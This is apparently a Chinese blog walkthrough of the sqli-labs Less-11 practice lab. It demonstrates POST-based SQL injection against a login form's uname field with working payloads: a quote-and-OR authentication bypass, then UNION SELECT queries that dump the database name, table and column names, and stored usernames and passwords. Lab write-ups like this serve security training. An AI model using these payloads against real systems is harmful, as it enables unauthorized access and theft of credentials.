sqli-labs的sql注入——基础挑战之less11

需要使用火狐插件hackbar插件(这里使用Post data)

1.有两个传入参数的地方,一个是username;一个是password
找到这两个传入参数所对应的名字uname和passwd(检查网页源代码)
sqli-labs的sql注入——基础挑战之less11_第1张图片
2.uname=username &&passwd=password 是注入点;在uname=admin' 加入单引号报错,通过报错信息,证明是单引号字符型注入
sqli-labs的sql注入——基础挑战之less11_第2张图片
3.逻辑算法输入真值得到用户和密码;uname=admin' or '1'='1# &&passwd=password
sqli-labs的sql注入——基础挑战之less11_第3张图片
4.暴当前使用的数据库uname=1admin'union select 1,database()# &&passwd=password
sqli-labs的sql注入——基础挑战之less11_第4张图片
5.暴库中表uname=1admin'union select group_concat(table_name),database() from information_schema.tables where table_schema = database() # &&passwd=password
sqli-labs的sql注入——基础挑战之less11_第5张图片
6.暴表中列 uname=1admin'union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # &&passwd=password
sqli-labs的sql注入——基础挑战之less11_第6张图片
7.暴出列中的数据,这样我们就可以得到想知道的用户密码uname=1admin' union select username,password from users where id=5 # &&passwd=password
sqli-labs的sql注入——基础挑战之less11_第7张图片



你可能感兴趣的:(SQL注入)